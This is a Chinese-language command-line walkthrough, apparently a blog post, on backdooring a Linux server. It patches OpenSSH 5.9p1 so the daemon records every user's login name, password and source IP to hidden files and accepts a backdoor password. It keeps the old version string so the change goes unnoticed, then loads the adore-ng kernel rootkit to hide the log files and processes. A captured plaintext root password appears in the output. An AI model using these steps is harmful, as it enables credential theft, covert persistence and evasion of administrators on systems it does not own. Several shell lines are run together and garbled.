[root@mufeng ~]# mkdir /software[root@mufeng ~]# cd !$cd /software
[root@mufeng software]# yum install lr* -y &>/dev/null && echo "ok"
ok
[root@mufeng software]# rz ## 上传软件包[root@mufeng software]# ls
0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz
inotify-tools-3.13.tar.gz sshpass-1.06.tar.gz
上传完成包之后,开始对打补丁并进行安装:
二. 对openssh-5.9p1 打后门漏洞补丁
2.1 解压
[root@mufeng software]# tar xf openssh-5.9p1.tar.gz
You have mail in /var/spool/mail/root
[root@mufeng software]# tar xf 0x06-openssh-5.9p1.patch.tar.gz [root@mufeng software]# ls
0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1 openssh-5.9p1.tar.gz
inotify-tools-3.13.tar.gz openssh-5.9p1.patch sshpass-1.06.tar.gz
[root@mufeng software]#
[root@mufeng openssh-5.9p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5[root@mufeng openssh-5.9p1]# make && make install
2.5 启动并查看版本号
[root@mufeng openssh-5.9p1]# service sshd restart
停止 sshd: [确定]
正在启动 sshd: [确定][root@mufeng openssh-5.9p1]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
这里一定要设置的与ssh原来的版本号一致,要不然就暴露了。
三. 测试
测试主要基于以下几点:
测试是否可以记录对方登录服务器的账号和密码
测试在用户修改密码后,还能继续记录账号和密码
测试是否可以记录普通用户的密码
测试是否可以使用后门漏洞密码登录系统
3.1 测试能否记录用户名和密码
root@mufeng tmp]# ssh 192.168.1.43
The authenticity of host'192.168.1.43 (192.168.1.43)' can't be established.
ECDSA key fingerprint is bf:a1:c7:0d:6c:4b:e4:19:f5:b8:16:e3:f8:4a:e5:5c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.43' (ECDSA) to the list of known hosts.
root@192.168.1.43's password:
Last login: Fri Mar 1714:40:10 2023 from 192.168.1.4
[root@mufeng ~]# exitlogout
Connection to 192.168.1.43 closed.
[root@mufeng tmp]# ls
ilog olog
##查看是否可以记录密码[root@mufeng tmp]# cat ilog
user:password --> root:12345678
## 包含用户名+密码+IP[root@mufeng tmp]# cat olog
user:password@host --> root:12345678@192.168.1.43
[root@mufeng tmp]#
安装
[root@mufeng adore-ng-master]# make
加载模块
[root@mufeng adore-ng-master]# insmod adore-ng.ko[root@mufeng adore-ng-master]#
查看命令是否安装
[root@mufeng adore-ng-master]# ./ava h
Usage: ./ava h,u,r,R,i,v,U [file or PID]
I print info (secret UID etc)
h hide file# 隐藏文件
u unhide file## 不隐藏
r execute as root ## 像root一样去运行
R remove PID forever
U uninstall adore
i make PID invisible ## 隐藏进程vmake PID visible
4.2 隐藏文件
需要隐藏 ilog, olog
[root@mufeng adore-ng-master]# ./ava h /tmp/ilog
56,0,0,56
Adore 1.56 installed. Good luck.
File '/tmp/ilog' is now hidden.
[root@mufeng adore-ng-master]#
[root@mufeng adore-ng-master]# ./ava h /tmp/olog
56,0,0,56
Adore 1.56 installed. Good luck.
File '/tmp/olog' is now hidden.